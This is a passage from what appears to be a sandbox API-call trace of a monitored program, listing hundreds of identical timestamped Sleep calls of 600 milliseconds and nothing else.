(dwMilliseconds=0x258) [0200.342] Sleep (dwMilliseconds=0x258) [0200.373] Sleep (dwMilliseconds=0x258) [0200.390] Sleep (dwMilliseconds=0x258) [0200.403] Sleep (dwMilliseconds=0x258) [0200.452] Sleep (dwMilliseconds=0x258) [0200.483] Sleep (dwMilliseconds=0x258) [0200.498] Sleep (dwMilliseconds=0x258) [0200.513] Sleep (dwMilliseconds=0x258) [0200.561] Sleep (dwMilliseconds=0x258) [0200.606] Sleep (dwMilliseconds=0x258) [0200.648] Sleep (dwMilliseconds=0x258) [0200.654] Sleep (dwMilliseconds=0x258) [0200.701] Sleep (dwMilliseconds=0x258) [0200.933] Sleep (dwMilliseconds=0x258) [0200.997] Sleep (dwMilliseconds=0x258) [0201.045] Sleep (dwMilliseconds=0x258) [0201.079] Sleep (dwMilliseconds=0x258) [0201.090] Sleep (dwMilliseconds=0x258) [0201.118] Sleep (dwMilliseconds=0x258) [0201.168] Sleep (dwMilliseconds=0x258) [0201.207] Sleep (dwMilliseconds=0x258) [0201.216] Sleep (dwMilliseconds=0x258) [0201.281] Sleep (dwMilliseconds=0x258) [0201.326] Sleep (dwMilliseconds=0x258) [0201.388] Sleep (dwMilliseconds=0x258) [0201.432] Sleep (dwMilliseconds=0x258) [0201.434] Sleep (dwMilliseconds=0x258) [0201.481] Sleep (dwMilliseconds=0x258) [0201.522] Sleep (dwMilliseconds=0x258) [0201.528] Sleep (dwMilliseconds=0x258) [0201.577] Sleep (dwMilliseconds=0x258) [0201.615] Sleep (dwMilliseconds=0x258) [0201.622] Sleep (dwMilliseconds=0x258) [0201.670] Sleep (dwMilliseconds=0x258) [0201.708] Sleep (dwMilliseconds=0x258) [0201.721] Sleep (dwMilliseconds=0x258) [0201.736] Sleep (dwMilliseconds=0x258) [0201.781] Sleep (dwMilliseconds=0x258) [0201.855] Sleep (dwMilliseconds=0x258) [0201.906] Sleep (dwMilliseconds=0x258) [0201.941] Sleep (dwMilliseconds=0x258) [0201.952] Sleep (dwMilliseconds=0x258) [0201.969] Sleep (dwMilliseconds=0x258) [0202.012] Sleep (dwMilliseconds=0x258) [0202.044] Sleep (dwMilliseconds=0x258) [0202.059] Sleep (dwMilliseconds=0x258) [0202.122] Sleep (dwMilliseconds=0x258) [0202.150] Sleep (dwMilliseconds=0x258) [0202.152] Sleep (dwMilliseconds=0x258) [0202.168] Sleep (dwMilliseconds=0x258) [0202.219] Sleep (dwMilliseconds=0x258) [0202.244] Sleep (dwMilliseconds=0x258) [0202.246] Sleep (dwMilliseconds=0x258) [0202.266] Sleep (dwMilliseconds=0x258) [0202.330] Sleep (dwMilliseconds=0x258) [0202.354] Sleep (dwMilliseconds=0x258) [0202.356] Sleep (dwMilliseconds=0x258) [0202.375] Sleep (dwMilliseconds=0x258) [0202.422] Sleep (dwMilliseconds=0x258) [0202.457] Sleep (dwMilliseconds=0x258) [0202.470] Sleep (dwMilliseconds=0x258) [0202.483] Sleep (dwMilliseconds=0x258) [0202.545] Sleep (dwMilliseconds=0x258) [0202.590] Sleep (dwMilliseconds=0x258) [0202.657] Sleep (dwMilliseconds=0x258) [0202.702] Sleep (dwMilliseconds=0x258) [0202.721] Sleep (dwMilliseconds=0x258) [0202.733] Sleep (dwMilliseconds=0x258) [0202.766] Sleep (dwMilliseconds=0x258) [0202.812] Sleep (dwMilliseconds=0x258) [0202.874] Sleep (dwMilliseconds=0x258) [0202.891] Sleep (dwMilliseconds=0x258) [0202.938] Sleep (dwMilliseconds=0x258) [0202.962] Sleep (dwMilliseconds=0x258) [0202.966] Sleep (dwMilliseconds=0x258) [0202.983] Sleep (dwMilliseconds=0x258) [0203.032] Sleep (dwMilliseconds=0x258) [0203.059] Sleep (dwMilliseconds=0x258) [0203.079] Sleep (dwMilliseconds=0x258) [0203.153] Sleep (dwMilliseconds=0x258) [0203.203] Sleep (dwMilliseconds=0x258) [0203.218] Sleep (dwMilliseconds=0x258) [0203.269] Sleep (dwMilliseconds=0x258) [0203.312] Sleep (dwMilliseconds=0x258) [0203.334] Sleep (dwMilliseconds=0x258) [0203.340] Sleep (dwMilliseconds=0x258) [0203.376] Sleep (dwMilliseconds=0x258) [0203.419] Sleep (dwMilliseconds=0x258) [0203.444] Sleep (dwMilliseconds=0x258) [0203.450] Sleep (dwMilliseconds=0x258) [0203.483] Sleep (dwMilliseconds=0x258) [0203.521] Sleep (dwMilliseconds=0x258) [0203.528] Sleep (dwMilliseconds=0x258) [0203.575] Sleep (dwMilliseconds=0x258) [0203.596] Sleep (dwMilliseconds=0x258) [0203.606] Sleep (dwMilliseconds=0x258) [0203.622] Sleep (dwMilliseconds=0x258) [0203.750] Sleep (dwMilliseconds=0x258) [0203.782] Sleep (dwMilliseconds=0x258) [0203.803] Sleep (dwMilliseconds=0x258) [0203.847] Sleep (dwMilliseconds=0x258) [0203.907] Sleep (dwMilliseconds=0x258) [0203.926] Sleep (dwMilliseconds=0x258) [0203.936] Sleep (dwMilliseconds=0x258) [0203.969] Sleep (dwMilliseconds=0x258) [0204.016] Sleep (dwMilliseconds=0x258) [0204.039] Sleep (dwMilliseconds=0x258) [0204.043] Sleep (dwMilliseconds=0x258) [0204.061] Sleep (dwMilliseconds=0x258) [0204.116] Sleep (dwMilliseconds=0x258) [0204.153] Sleep (dwMilliseconds=0x258) [0204.170] Sleep (dwMilliseconds=0x258) [0204.254] Sleep (dwMilliseconds=0x258) [0204.289] Sleep (dwMilliseconds=0x258) [0204.294] Sleep (dwMilliseconds=0x258) [0204.309] Sleep (dwMilliseconds=0x258) [0204.357] Sleep (dwMilliseconds=0x258) [0204.379] Sleep (dwMilliseconds=0x258) [0204.388] Sleep (dwMilliseconds=0x258) [0204.403] Sleep (dwMilliseconds=0x258) [0204.452] Sleep (dwMilliseconds=0x258) [0204.475] Sleep (dwMilliseconds=0x258) [0204.484] Sleep (dwMilliseconds=0x258) [0204.512] Sleep (dwMilliseconds=0x258) [0204.562] Sleep (dwMilliseconds=0x258) [0204.606] Sleep (dwMilliseconds=0x258) [0204.654] Sleep (dwMilliseconds=0x258) [0204.716] Sleep (dwMilliseconds=0x258) [0204.750] Sleep (dwMilliseconds=0x258) [0204.770] Sleep (dwMilliseconds=0x258) [0204.778] Sleep (dwMilliseconds=0x258) [0204.950] Sleep (dwMilliseconds=0x258) [0204.999] Sleep (dwMilliseconds=0x258) [0205.044] Sleep (dwMilliseconds=0x258) [0205.083] Sleep (dwMilliseconds=0x258) [0205.090] Sleep (dwMilliseconds=0x258) [0205.116] Sleep (dwMilliseconds=0x258) [0205.171] Sleep (dwMilliseconds=0x258) [0205.219] Sleep (dwMilliseconds=0x258) [0205.264] Sleep (dwMilliseconds=0x258) [0205.313] Sleep (dwMilliseconds=0x258) [0205.356] Sleep (dwMilliseconds=0x258) [0205.419] Sleep (dwMilliseconds=0x258) [0205.460] Sleep (dwMilliseconds=0x258) [0205.466] Sleep (dwMilliseconds=0x258) [0205.481] Sleep (dwMilliseconds=0x258) [0205.545] Sleep (dwMilliseconds=0x258) [0205.590] Sleep (dwMilliseconds=0x258) [0205.633] Sleep (dwMilliseconds=0x258) [0205.637] Sleep (dwMilliseconds=0x258) [0205.685] Sleep (dwMilliseconds=0x258) [0205.706] Sleep (dwMilliseconds=0x258) [0205.716] Sleep (dwMilliseconds=0x258) [0205.732] Sleep (dwMilliseconds=0x258) [0205.779] Sleep (dwMilliseconds=0x258) [0205.811] Sleep (dwMilliseconds=0x258) [0205.829] Sleep (dwMilliseconds=0x258) [0205.907] Sleep (dwMilliseconds=0x258) [0205.957] Sleep (dwMilliseconds=0x258) [0206.046] Sleep (dwMilliseconds=0x258) [0206.094] Sleep (dwMilliseconds=0x258) [0206.156] Sleep (dwMilliseconds=0x258) [0206.241] Sleep (dwMilliseconds=0x258) [0206.247] Sleep (dwMilliseconds=0x258) [0206.313] Sleep (dwMilliseconds=0x258) [0206.349] Sleep (dwMilliseconds=0x258) [0206.359] Sleep (dwMilliseconds=0x258) [0206.403] Sleep (dwMilliseconds=0x258) [0206.428] Sleep (dwMilliseconds=0x258) [0206.434] Sleep (dwMilliseconds=0x258) [0206.451] Sleep (dwMilliseconds=0x258) [0206.496] Sleep (dwMilliseconds=0x258) [0206.544] Sleep (dwMilliseconds=0x258) [0206.582] Sleep (dwMilliseconds=0x258) [0206.591] Sleep (dwMilliseconds=0x258) [0206.637] Sleep (dwMilliseconds=0x258) [0206.660] Sleep (dwMilliseconds=0x258) [0206.668] Sleep (dwMilliseconds=0x258) [0206.686] Sleep (dwMilliseconds=0x258) [0206.731] Sleep (dwMilliseconds=0x258) [0206.779] Sleep (dwMilliseconds=0x258) [0206.822] Sleep (dwMilliseconds=0x258) [0206.827] Sleep (dwMilliseconds=0x258) [0206.888] Sleep (dwMilliseconds=0x258) [0206.971] Sleep (dwMilliseconds=0x258) [0207.031] Sleep (dwMilliseconds=0x258) [0207.072] Sleep (dwMilliseconds=0x258) [0207.074] Sleep (dwMilliseconds=0x258) [0207.097] Sleep (dwMilliseconds=0x258) [0207.153] Sleep (dwMilliseconds=0x258) [0207.173] Sleep (dwMilliseconds=0x258) [0207.186] Sleep (dwMilliseconds=0x258) [0207.219] Sleep (dwMilliseconds=0x258) [0207.264] Sleep (dwMilliseconds=0x258) [0207.328] Sleep (dwMilliseconds=0x258) [0207.374] Sleep (dwMilliseconds=0x258) [0207.437] Sleep (dwMilliseconds=0x258) [0207.478] Sleep (dwMilliseconds=0x258) [0207.482] Sleep (dwMilliseconds=0x258) [0207.496] Sleep (dwMilliseconds=0x258) [0207.545] Sleep (dwMilliseconds=0x258) [0207.564] Sleep (dwMilliseconds=0x258) [0207.578] Sleep (dwMilliseconds=0x258) [0207.610] Sleep (dwMilliseconds=0x258) [0207.656] Sleep (dwMilliseconds=0x258) [0207.715] Sleep (dwMilliseconds=0x258) [0207.755] Sleep (dwMilliseconds=0x258) [0207.766] Sleep (dwMilliseconds=0x258) [0207.781] Sleep (dwMilliseconds=0x258) [0207.919] Sleep (dwMilliseconds=0x258) [0208.004] Sleep (dwMilliseconds=0x258) [0208.090] Sleep (dwMilliseconds=0x258) [0208.170] Sleep (dwMilliseconds=0x258) [0208.262] Sleep (dwMilliseconds=0x258) [0208.357] Sleep (dwMilliseconds=0x258) [0208.517] Sleep (dwMilliseconds=0x258) [0208.580] Sleep (dwMilliseconds=0x258) [0208.607] Sleep (dwMilliseconds=0x258) [0208.625] Sleep (dwMilliseconds=0x258) [0208.639] Sleep (dwMilliseconds=0x258) [0208.687] Sleep (dwMilliseconds=0x258) [0208.708] Sleep (dwMilliseconds=0x258) [0208.716] Sleep (dwMilliseconds=0x258) [0208.733] Sleep (dwMilliseconds=0x258) [0208.782] Sleep (dwMilliseconds=0x258) [0208.800] Sleep (dwMilliseconds=0x258) [0208.812] Sleep (dwMilliseconds=0x258) [0208.842] Sleep (dwMilliseconds=0x258) [0208.907] Sleep (dwMilliseconds=0x258) [0208.923] Sleep (dwMilliseconds=0x258) [0208.942] Sleep (dwMilliseconds=0x258) [0208.965] Sleep (dwMilliseconds=0x258) [0209.016] Sleep (dwMilliseconds=0x258) [0209.059] Sleep (dwMilliseconds=0x258) [0209.117] Sleep (dwMilliseconds=0x258) [0209.122] Sleep (dwMilliseconds=0x258) [0209.141] Sleep (dwMilliseconds=0x258) [0209.187] Sleep (dwMilliseconds=0x258) [0209.229] Sleep (dwMilliseconds=0x258) [0209.231] Sleep (dwMilliseconds=0x258) [0209.250] Sleep (dwMilliseconds=0x258) [0209.296] Sleep (dwMilliseconds=0x258) [0209.318] Sleep (dwMilliseconds=0x258) [0209.324] Sleep (dwMilliseconds=0x258) [0209.359] Sleep (dwMilliseconds=0x258) [0209.403] Sleep (dwMilliseconds=0x258) [0209.544] Sleep (dwMilliseconds=0x258) [0209.559] Sleep (dwMilliseconds=0x258) [0209.639] Sleep (dwMilliseconds=0x258) [0209.684] Sleep (dwMilliseconds=0x258) [0209.732] Sleep (dwMilliseconds=0x258) [0209.794] Sleep (dwMilliseconds=0x258) [0209.942] Sleep (dwMilliseconds=0x258) [0210.021] Sleep (dwMilliseconds=0x258) [0210.066] Sleep (dwMilliseconds=0x258) [0210.116] Sleep (dwMilliseconds=0x258) [0210.160] Sleep (dwMilliseconds=0x258) [0210.172] Sleep (dwMilliseconds=0x258) [0210.213] Sleep (dwMilliseconds=0x258) [0210.252] Sleep (dwMilliseconds=0x258) [0210.263] Sleep (dwMilliseconds=0x258) [0210.309] Sleep (dwMilliseconds=0x258) [0210.331] Sleep (dwMilliseconds=0x258) [0210.340] Sleep (dwMilliseconds=0x258) [0210.357] Sleep (dwMilliseconds=0x258) [0210.403] Sleep (dwMilliseconds=0x258) [0210.450] Sleep (dwMilliseconds=0x258) [0210.484] Sleep (dwMilliseconds=0x258) [0210.498] Sleep (dwMilliseconds=0x258) [0210.543] Sleep (dwMilliseconds=0x258) [0210.574] Sleep (dwMilliseconds=0x258) [0210.590] Sleep (dwMilliseconds=0x258) [0210.639] Sleep (dwMilliseconds=0x258) [0210.684] Sleep (dwMilliseconds=0x258) [0210.724] Sleep (dwMilliseconds=0x258) [0210.731] Sleep (dwMilliseconds=0x258) [0210.982] Sleep (dwMilliseconds=0x258) [0211.056] Sleep (dwMilliseconds=0x258) [0211.116] Sleep (dwMilliseconds=0x258) [0211.152] Sleep (dwMilliseconds=0x258) [0211.168] Sleep (dwMilliseconds=0x258) [0211.219] Sleep (dwMilliseconds=0x258) [0211.239] Sleep (dwMilliseconds=0x258) [0211.248] Sleep (dwMilliseconds=0x258) [0211.267] Sleep (dwMilliseconds=0x258) [0211.335] Sleep (dwMilliseconds=0x258) [0211.383] Sleep (dwMilliseconds=0x258) [0211.391] Sleep (dwMilliseconds=0x258) [0211.437] Sleep (dwMilliseconds=0x258) [0211.486] Sleep (dwMilliseconds=0x258) [0211.507] Sleep (dwMilliseconds=0x258) [0211.513] Sleep (dwMilliseconds=0x258) [0211.529] Sleep (dwMilliseconds=0x258) [0211.576] Sleep (dwMilliseconds=0x258) [0211.597] Sleep (dwMilliseconds=0x258) [0211.606] Sleep (dwMilliseconds=0x258) [0211.621] Sleep (dwMilliseconds=0x258) [0211.669] Sleep (dwMilliseconds=0x258) [0211.715] Sleep (dwMilliseconds=0x258) [0211.748] Sleep (dwMilliseconds=0x258) [0211.763] Sleep (dwMilliseconds=0x258) [0211.779] Sleep (dwMilliseconds=0x258) [0211.824] Sleep (dwMilliseconds=0x258) [0211.873] Sleep (dwMilliseconds=0x258) [0211.933] Sleep (dwMilliseconds=0x258) [0211.954] Sleep (dwMilliseconds=0x258) [0212.000] Sleep (dwMilliseconds=0x258) [0212.035] Sleep (dwMilliseconds=0x258) [0212.046] Sleep (dwMilliseconds=0x258) [0212.062] Sleep (dwMilliseconds=0x258) [0212.122] Sleep (dwMilliseconds=0x258) [0212.168] Sleep (dwMilliseconds=0x258) [0212.184] Sleep (dwMilliseconds=0x258) [0212.235] Sleep (dwMilliseconds=0x258) [0212.278] Sleep (dwMilliseconds=0x258) [0212.296] Sleep (dwMilliseconds=0x258) [0212.347] Sleep (dwMilliseconds=0x258) [0212.381] Sleep (dwMilliseconds=0x258) [0212.388] Sleep (dwMilliseconds=0x258) [0212.452] Sleep (dwMilliseconds=0x258) [0212.486] Sleep (dwMilliseconds=0x258) [0212.496] Sleep (dwMilliseconds=0x258) [0212.548] Sleep (dwMilliseconds=0x258) [0212.584] Sleep (dwMilliseconds=0x258) [0212.591] Sleep (dwMilliseconds=0x258) [0212.609] Sleep (dwMilliseconds=0x258) [0212.658] Sleep (dwMilliseconds=0x258) [0212.692] Sleep (dwMilliseconds=0x258) [0212.704] Sleep (dwMilliseconds=0x258) [0212.718] Sleep (dwMilliseconds=0x258) [0212.768] Sleep (dwMilliseconds=0x258) [0212.806] Sleep (dwMilliseconds=0x258) [0212.887] Sleep (dwMilliseconds=0x258) [0212.989] Sleep (dwMilliseconds=0x258) [0213.093] Sleep (dwMilliseconds=0x258) [0213.231] Sleep (dwMilliseconds=0x258) [0213.252] Sleep (dwMilliseconds=0x258) [0213.329] Sleep (dwMilliseconds=0x258) [0213.357] Sleep (dwMilliseconds=0x258) [0213.372] Sleep (dwMilliseconds=0x258) [0213.423] Sleep (dwMilliseconds=0x258) [0213.454] Sleep (dwMilliseconds=0x258) [0213.469] Sleep (dwMilliseconds=0x258) [0213.481] Sleep (dwMilliseconds=0x258) [0213.531] Sleep (dwMilliseconds=0x258) [0213.575] Sleep (dwMilliseconds=0x258) [0213.627] Sleep (dwMilliseconds=0x258) [0213.675] Sleep (dwMilliseconds=0x258) [0213.691] Sleep (dwMilliseconds=0x258) [0213.699] Sleep (dwMilliseconds=0x258) [0213.736] Sleep (dwMilliseconds=0x258) [0213.780] Sleep (dwMilliseconds=0x258) [0213.826] Sleep (dwMilliseconds=0x258) [0213.872] Sleep (dwMilliseconds=0x258) [0213.968] Sleep (dwMilliseconds=0x258) [0214.013] Sleep (dwMilliseconds=0x258) [0214.077] Sleep (dwMilliseconds=0x258) [0214.125] Sleep (dwMilliseconds=0x258) [0214.142] Sleep (dwMilliseconds=0x258) [0214.188] Sleep (dwMilliseconds=0x258) [0214.234] Sleep (dwMilliseconds=0x258) [0214.278] Sleep (dwMilliseconds=0x258) [0214.435] Sleep (dwMilliseconds=0x258) [0214.485] Sleep (dwMilliseconds=0x258) [0214.531] Sleep (dwMilliseconds=0x258) [0214.594] Sleep (dwMilliseconds=0x258) [0214.639] Sleep (dwMilliseconds=0x258) [0214.657] Sleep (dwMilliseconds=0x258) [0214.704] Sleep (dwMilliseconds=0x258) [0214.748] Sleep (dwMilliseconds=0x258) [0214.801] Sleep (dwMilliseconds=0x258) [0214.862] Sleep (dwMilliseconds=0x258) [0214.887] Sleep (dwMilliseconds=0x258) [0214.953] Sleep (dwMilliseconds=0x258) [0215.000] Sleep (dwMilliseconds=0x258) [0215.064] Sleep (dwMilliseconds=0x258) [0215.148] Sleep (dwMilliseconds=0x258) [0215.203] Sleep (dwMilliseconds=0x258) [0215.251] Sleep (dwMilliseconds=0x258) [0215.306] Sleep (dwMilliseconds=0x258) [0215.311] Sleep (dwMilliseconds=0x258) [0215.327] Sleep (dwMilliseconds=0x258) [0215.375] Sleep (dwMilliseconds=0x258) [0215.425] Sleep (dwMilliseconds=0x258) [0215.439] Sleep (dwMilliseconds=0x258) [0215.483] Sleep (dwMilliseconds=0x258) [0215.571] Sleep (dwMilliseconds=0x258) [0215.574] Sleep (dwMilliseconds=0x258) [0215.594] Sleep (dwMilliseconds=0x258) [0215.639] Sleep (dwMilliseconds=0x258) [0215.658] Sleep (dwMilliseconds=0x258) [0215.670] Sleep (dwMilliseconds=0x258) [0215.717] Sleep (dwMilliseconds=0x258) [0215.781] Sleep (dwMilliseconds=0x258) [0215.809] Sleep (dwMilliseconds=0x258) [0215.825] Sleep (dwMilliseconds=0x258) [0215.875] Sleep (dwMilliseconds=0x258) [0215.894] Sleep (dwMilliseconds=0x258) [0215.904] Sleep (dwMilliseconds=0x258) [0215.963] Sleep (dwMilliseconds=0x258) [0216.003] Sleep (dwMilliseconds=0x258) [0216.013] Sleep (dwMilliseconds=0x258) [0216.059] Sleep (dwMilliseconds=0x258) [0216.088] Sleep (dwMilliseconds=0x258) [0216.090] Sleep (dwMilliseconds=0x258) [0216.118] Sleep (dwMilliseconds=0x258) [0216.153] Sleep (dwMilliseconds=0x258) [0216.193] Sleep (dwMilliseconds=0x258) [0216.202] Sleep (dwMilliseconds=0x258) [0216.219] Sleep (dwMilliseconds=0x258) [0216.265] Sleep (dwMilliseconds=0x258) [0216.289] Sleep (dwMilliseconds=0x258) [0216.294] Sleep (dwMilliseconds=0x258) [0216.314] Sleep (dwMilliseconds=0x258) [0216.356] Sleep (dwMilliseconds=0x258) [0216.394] Sleep (dwMilliseconds=0x258) [0216.403] Sleep (dwMilliseconds=0x258) [0216.419] Sleep (dwMilliseconds=0x258) [0216.465] Sleep (dwMilliseconds=0x258) [0216.514] Sleep (dwMilliseconds=0x258) [0216.547] Sleep (dwMilliseconds=0x258) [0216.560] Sleep (dwMilliseconds=0x258) [0216.574] Sleep (dwMilliseconds=0x258) [0216.624] Sleep (dwMilliseconds=0x258) [0216.668] Sleep (dwMilliseconds=0x258) [0216.764] Sleep (dwMilliseconds=0x258) [0216.809] Sleep (dwMilliseconds=0x258) [0216.847] Sleep (dwMilliseconds=0x258) [0216.856] Sleep (dwMilliseconds=0x258) [0216.904] Sleep (dwMilliseconds=0x258) [0216.935] Sleep (dwMilliseconds=0x258) [0216.950] Sleep (dwMilliseconds=0x258) [0216.966] Sleep (dwMilliseconds=0x258) [0217.046] Sleep (dwMilliseconds=0x258) [0217.060] Sleep (dwMilliseconds=0x258) [0217.076] Sleep (dwMilliseconds=0x258) [0217.112] Sleep (dwMilliseconds=0x258) [0217.156] Sleep (dwMilliseconds=0x258) [0217.218] Sleep (dwMilliseconds=0x258) [0217.267] Sleep (dwMilliseconds=0x258) [0217.283] Sleep (dwMilliseconds=0x258) [0217.296] Sleep (dwMilliseconds=0x258) [0217.327] Sleep (dwMilliseconds=0x258) [0217.375] Sleep (dwMilliseconds=0x258) [0217.418] Sleep (dwMilliseconds=0x258) [0217.469] Sleep (dwMilliseconds=0x258) [0217.515] Sleep (dwMilliseconds=0x258) [0217.564] Sleep (dwMilliseconds=0x258) [0217.580] Sleep (dwMilliseconds=0x258) [0217.594] Sleep (dwMilliseconds=0x258) [0217.626] Sleep (dwMilliseconds=0x258) [0217.671] Sleep (dwMilliseconds=0x258) [0217.690] Sleep (dwMilliseconds=0x258) [0217.702] Sleep (dwMilliseconds=0x258) [0217.734] Sleep (dwMilliseconds=0x258) [0217.797] Sleep (dwMilliseconds=0x258) [0217.809] Sleep (dwMilliseconds=0x258) [0217.859] Sleep (dwMilliseconds=0x258) [0217.904] Sleep (dwMilliseconds=0x258) [0217.923] Sleep (dwMilliseconds=0x258) [0217.968] Sleep (dwMilliseconds=0x258) [0217.997] Sleep (dwMilliseconds=0x258) [0218.069] Sleep (dwMilliseconds=0x258) [0218.117] Sleep (dwMilliseconds=0x258) [0218.183] Sleep (dwMilliseconds=0x258) [0218.247] Sleep (dwMilliseconds=0x258) [0218.296] Sleep (dwMilliseconds=0x258) [0218.321] Sleep (dwMilliseconds=0x258) [0218.325] Sleep (dwMilliseconds=0x258) [0218.340] Sleep (dwMilliseconds=0x258) [0218.390] Sleep (dwMilliseconds=0x258) [0218.435] Sleep (dwMilliseconds=0x258) [0218.487] Sleep (dwMilliseconds=0x258) [0218.624] Sleep (dwMilliseconds=0x258) [0218.670] Sleep (dwMilliseconds=0x258) [0218.717] Sleep (dwMilliseconds=0x258) [0218.753] Sleep (dwMilliseconds=0x258) [0218.764] Sleep (dwMilliseconds=0x258) [0218.781] Sleep (dwMilliseconds=0x258) [0218.828] Sleep (dwMilliseconds=0x258) [0218.861] Sleep (dwMilliseconds=0x258) [0218.872] Sleep (dwMilliseconds=0x258) [0218.891] Sleep (dwMilliseconds=0x258) [0218.937] Sleep (dwMilliseconds=0x258) [0218.969] Sleep (dwMilliseconds=0x258) [0218.981] Sleep (dwMilliseconds=0x258) [0219.014] Sleep (dwMilliseconds=0x258) [0219.139] Sleep (dwMilliseconds=0x258) [0219.187] Sleep (dwMilliseconds=0x258) [0219.231] Sleep (dwMilliseconds=0x258) [0219.281] Sleep (dwMilliseconds=0x258) [0219.313] Sleep (dwMilliseconds=0x258) [0219.328] Sleep (dwMilliseconds=0x258) [0219.340] Sleep (dwMilliseconds=0x258) [0219.391] Sleep (dwMilliseconds=0x258) [0219.410] Sleep (dwMilliseconds=0x258) [0219.420] Sleep (dwMilliseconds=0x258) [0219.449] Sleep (dwMilliseconds=0x258) [0219.500] Sleep (dwMilliseconds=0x258) [0219.543] Sleep (dwMilliseconds=0x258) [0219.591] Sleep (dwMilliseconds=0x258) [0219.656] Sleep (dwMilliseconds=0x258) [0219.692] Sleep (dwMilliseconds=0x258) [0219.702] Sleep (dwMilliseconds=0x258) [0219.715] Sleep (dwMilliseconds=0x258) [0219.766] Sleep (dwMilliseconds=0x258) [0219.793] Sleep (dwMilliseconds=0x258) [0219.825] Sleep (dwMilliseconds=0x258) [0219.876] Sleep (dwMilliseconds=0x258) [0219.921] Sleep (dwMilliseconds=0x258) [0219.970] Sleep (dwMilliseconds=0x258) [0220.016] Sleep (dwMilliseconds=0x258) [0220.115] Sleep (dwMilliseconds=0x258) [0220.155] Sleep (dwMilliseconds=0x258) [0220.168] Sleep (dwMilliseconds=0x258) [0220.219] Sleep (dwMilliseconds=0x258) [0220.250] Sleep (dwMilliseconds=0x258) [0220.360] Sleep (dwMilliseconds=0x258) [0220.375] Sleep (dwMilliseconds=0x258) [0220.422] Sleep (dwMilliseconds=0x258) [0220.444] Sleep (dwMilliseconds=0x258) [0220.450] Sleep (dwMilliseconds=0x258) [0220.467] Sleep (dwMilliseconds=0x258) [0220.515] Sleep (dwMilliseconds=0x258) [0220.534] Sleep (dwMilliseconds=0x258) [0220.546] Sleep (dwMilliseconds=0x258) [0220.577] Sleep (dwMilliseconds=0x258) [0220.715] Sleep (dwMilliseconds=0x258) [0220.809] Sleep (dwMilliseconds=0x258) [0220.923] Sleep (dwMilliseconds=0x258) [0221.003] Sleep (dwMilliseconds=0x258) [0221.124] Sleep (dwMilliseconds=0x258) [0221.205] Sleep (dwMilliseconds=0x258) [0221.242] Sleep (dwMilliseconds=0x258) [0221.253] Sleep (dwMilliseconds=0x258) [0221.281] Sleep (dwMilliseconds=0x258) [0221.325] Sleep (dwMilliseconds=0x258) [0221.345] Sleep (dwMilliseconds=0x258) [0221.356] Sleep (dwMilliseconds=0x258) [0221.407] Sleep (dwMilliseconds=0x258) [0221.449] Sleep (dwMilliseconds=0x258) [0221.562] Sleep (dwMilliseconds=0x258) [0221.608] Sleep (dwMilliseconds=0x258) [0221.653] Sleep (dwMilliseconds=0x258) [0221.692] Sleep (dwMilliseconds=0x258) [0221.700] Sleep (dwMilliseconds=0x258) [0221.718] Sleep (dwMilliseconds=0x258) [0221.764] Sleep (dwMilliseconds=0x258) [0221.784] Sleep (dwMilliseconds=0x258) [0221.794] Sleep (dwMilliseconds=0x258) [0221.828] Sleep (dwMilliseconds=0x258) [0221.874] Sleep (dwMilliseconds=0x258) [0221.937] Sleep (dwMilliseconds=0x258) [0221.986] Sleep (dwMilliseconds=0x258) [0221.999] Sleep (dwMilliseconds=0x258) [0222.016] Sleep (dwMilliseconds=0x258) [0222.063] Sleep (dwMilliseconds=0x258) [0222.124] Sleep (dwMilliseconds=0x258) [0222.141] Sleep (dwMilliseconds=0x258) [0222.169] Sleep (dwMilliseconds=0x258) [0222.221] Sleep (dwMilliseconds=0x258) [0222.238] Sleep (dwMilliseconds=0x258) [0222.247] Sleep (dwMilliseconds=0x258) [0222.280] Sleep (dwMilliseconds=0x258) [0222.329] Sleep (dwMilliseconds=0x258) [0222.344] Sleep (dwMilliseconds=0x258) [0222.357] Sleep (dwMilliseconds=0x258) [0222.390] Sleep (dwMilliseconds=0x258) [0222.438] Sleep (dwMilliseconds=0x258) [0222.497] Sleep (dwMilliseconds=0x258) [0222.550] Sleep (dwMilliseconds=0x258) [0222.583] Sleep (dwMilliseconds=0x258) [0222.592] Sleep (dwMilliseconds=0x258) [0222.609] Sleep (dwMilliseconds=0x258) [0222.656] Sleep (dwMilliseconds=0x258) [0222.683] Sleep (dwMilliseconds=0x258) [0222.703] Sleep (dwMilliseconds=0x258) [0222.750] Sleep (dwMilliseconds=0x258) [0222.769] Sleep (dwMilliseconds=0x258) [0222.780] Sleep (dwMilliseconds=0x258) [0222.813] Sleep (dwMilliseconds=0x258) [0222.859] Sleep (dwMilliseconds=0x258) [0222.923] Sleep (dwMilliseconds=0x258) [0222.970] Sleep (dwMilliseconds=0x258) [0222.988] Sleep (dwMilliseconds=0x258) [0222.999] Sleep (dwMilliseconds=0x258) [0223.032] Sleep (dwMilliseconds=0x258) [0223.119] Sleep (dwMilliseconds=0x258) [0223.150] Sleep (dwMilliseconds=0x258) [0223.155] Sleep (dwMilliseconds=0x258) [0223.171] Sleep (dwMilliseconds=0x258) [0223.219] Sleep (dwMilliseconds=0x258) [0223.258] Sleep (dwMilliseconds=0x258) [0223.262] Sleep (dwMilliseconds=0x258) [0223.311] Sleep (dwMilliseconds=0x258) [0223.346] Sleep (dwMilliseconds=0x258) [0223.357] Sleep (dwMilliseconds=0x258) [0223.375] Sleep (dwMilliseconds=0x258) [0223.422] Sleep (dwMilliseconds=0x258) [0223.456] Sleep (dwMilliseconds=0x258) [0223.465] Sleep (dwMilliseconds=0x258) [0223.484] Sleep (dwMilliseconds=0x258) [0223.528] Sleep (dwMilliseconds=0x258) [0223.552] Sleep (dwMilliseconds=0x258) [0223.559] Sleep (dwMilliseconds=0x258) [0223.594] Sleep (dwMilliseconds=0x258) [0223.639] Sleep (dwMilliseconds=0x258) [0223.703] Sleep (dwMilliseconds=0x258) [0223.733] Sleep (dwMilliseconds=0x258) [0223.747] Sleep (dwMilliseconds=0x258) [0223.794] Sleep (dwMilliseconds=0x258) [0223.831] Sleep (dwMilliseconds=0x258) [0223.842] Sleep (dwMilliseconds=0x258) [0223.892] Sleep (dwMilliseconds=0x258) [0223.935] Sleep (dwMilliseconds=0x258) [0223.984] Sleep (dwMilliseconds=0x258) [0224.014] Sleep (dwMilliseconds=0x258) [0224.037] Sleep (dwMilliseconds=0x258) [0224.062] Sleep (dwMilliseconds=0x258) [0224.157] Sleep (dwMilliseconds=0x258) [0224.172] Sleep (dwMilliseconds=0x258) [0224.187] Sleep (dwMilliseconds=0x258) [0224.218] Sleep (dwMilliseconds=0x258) [0224.267] Sleep (dwMilliseconds=0x258) [0224.286] 